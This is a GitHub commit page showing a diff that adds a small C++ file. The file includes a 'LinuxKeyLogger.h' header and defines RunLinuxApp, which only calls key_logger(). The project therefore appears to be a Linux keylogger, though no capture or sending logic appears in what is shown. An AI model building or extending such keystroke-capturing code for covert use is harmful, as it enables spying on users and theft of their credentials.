We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 3416953 commit bcd0ce8Copy full SHA for bcd0ce8
src/linux/LinuxApp.cpp
@@ -0,0 +1,6 @@
1
+#include "LinuxKeyLogger.h"
2
+
3
+int RunLinuxApp ( ) {
4
+ key_logger();
5
+ return 0;
6
+}
0 commit comments